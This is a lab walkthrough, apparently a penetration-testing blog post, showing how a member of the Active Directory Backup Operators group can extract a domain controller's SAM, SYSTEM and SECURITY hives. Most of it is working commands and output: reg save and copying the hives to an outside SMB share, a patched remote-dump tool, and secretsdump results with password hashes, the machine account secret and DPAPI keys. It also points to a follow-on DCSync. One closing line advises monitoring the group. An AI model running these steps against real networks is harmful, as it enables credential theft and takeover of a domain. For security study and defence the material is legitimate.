Backup Operator Privilege Escalation

Backup Operators is a default security group in Active Directory. Microsoft provide the following description;

Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group can’t be renamed, deleted, or removed. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers.

This article will look at a couple of ways of extracting the SAM database of a domain controller using an account that is a member of the Backup Operators group.

Local SAM Database Extraction

In our lab environment, we can see the user Alice is a member of the Backup Operators and Remote Management group;

net user alice /domain
The request will be processed at a domain controller for domain bordergate.local.

User name                    alice
Full Name                    alice
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            01/12/2023 12:56:20
Password expires             Never
Password changeable          02/12/2023 12:56:20
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   26/01/2024 14:15:42

Logon hours allowed          All

Local Group Memberships      *Backup Operators     *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

Since Alice is a member of the Remote Management Users group, we can create a PSRemoting session to the domain controller. Since they have the SeBackupPrivilege as being part of the Backup Operators group, we can take a copy of the HKLM SAM and SYSTEM hives.

PS C:\Users\alice> Enter-PSSession DC01
[DC01]: PS C:\Users\alice\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

[DC01]: PS C:\Users\alice\Documents> reg save hklm\sam c:\Windows\Tasks\SAM
The operation completed successfully.

[DC01]: PS C:\Users\alice\Documents> reg save hklm\system c:\Windows\Tasks\SYSTEM
The operation completed successfully.

[DC01]: PS C:\Windows\Tasks> copy SAM \\192.168.1.210\shared\SAM
[DC01]: PS C:\Windows\Tasks> copy SYSTEM \\192.168.1.210\shared\SYSTEM

We can then use impacket-secretsdump to extract the local administrator credentials for the host;

impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x8ac0fb2e229cb0c79777bb8125015a6c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bce86ff3bde5a13e0a97398231766df1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... 
                                                     

Remote SAM Database Extraction

If the user is unable to interactively login to domain controllers, we can still extract the SAM database remotely using a patched version of the impacket reg.py tool, which is available here; https://github.com/horizon3ai/backup_dc_registry.

python reg.py alice:'Password1'@192.168.1.205 backup -p '\\192.168.1.210\shared\'
Impacket v0.11.0 - Copyright 2023 Fortra

Dumping SAM hive to \\192.168.1.210\shared\\SAM
Dumping SYSTEM hive to \\192.168.1.210\shared\\SYSTEM
Dumping SECURITY hive to \\192.168.1.210\shared\\SECURITY

Since the SECURITY hive is also backed up using this method, we can also extract LSA secrets;

impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x8ac0fb2e229cb0c79777bb8125015a6c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bce86ff3bde5a13e0a97398231766df1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:25069e75ab3f1b9321b9c9455bf7627aef9d778bac417b22f0ec1c0694511eb38d702273c060276d1be8a5ab54b7fa8eba7a21ee5abfd801d78775c2a33b01e448709fc230db4b41b21976503f308897f32302fee191e98b85f468b8846df1bc54ea4a2231c764ac4ee9ba8ea8e701762c64a05717cced16036dbeda9725ebb9f92a6ed288d6904bbde92bb72b06438504d1ed8c8a7c59f49e5107114cd6a684cec67460cdf6a26176a0523fed417714287021725eeb8a0dc47b51bf8a0faf9b44806fa01a83ac037da40ef7a7c55a25ed02b1d77cb47bf6f8a8f51ea65b7ab69354d52856f5f5a068c8ef8442a6e41c
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:92312aa97b085a7d597f5aa8af114c9f
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x06d5b029e0966077058a8f25dfd3fa714c936f90
dpapi_userkey:0xfe1b2836006a6f73943efc9dc6cf2d0a43d90e88
[*] NL$KM 
 0000   43 8F 81 A3 36 D3 B0 2B  87 BA 1C 95 AF BE 33 DA   C...6..+......3.
 0010   92 94 45 3E 55 BD EE 67  D7 F0 05 50 39 CA 7F F9   ..E>U..g...P9...
 0020   D9 9D 8B FD C9 B7 F4 8C  25 89 9B 52 CB 27 2E C0   ........%..R.'..
 0030   42 E7 3E DB 56 35 70 8E  41 C6 78 A5 20 F2 C6 C4   B.>.V5p.A.x. ...
NL$KM:438f81a336d3b02b87ba1c95afbe33da9294453e55bdee67d7f0055039ca7ff9d99d8bfdc9b7f48c25899b52cb272ec042e73edb5635708e41c678a520f2c6c4
[*] Cleaning up... 

The machine account credentials could then be used to DCSync domain credentials.

In Conclusion

Backup Operators is a privileged group, and should be monitored and protected in a similar manner to Enterprise/Domain administrator groups.